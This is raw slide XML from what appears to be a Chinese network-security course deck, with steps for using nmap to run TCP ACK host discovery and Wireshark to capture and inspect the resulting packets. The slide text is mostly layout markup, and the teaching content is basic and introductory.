              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="文本框 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5808345" y="1084898"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.利用Wireshark工具抓取nmap工具发送的数据包，如图2-2-14所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5808345" y="1730058"/>
            <a:ext cx="5276850" cy="3590925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="文本框 118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5808345" y="5320983"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-14 Wireshark工具抓取数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP ACK协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤三</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="文本框 118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5844540" y="975360"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.筛选信息进行分析，可以发现nmap工具向目标主机的80端口发送了一个ACK包，如图2-2-15所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5844540" y="1897380"/>
            <a:ext cx="5276850" cy="3600450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="文本框 119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5844540" y="5497830"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-15 发送ACK包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP ACK协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤三</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
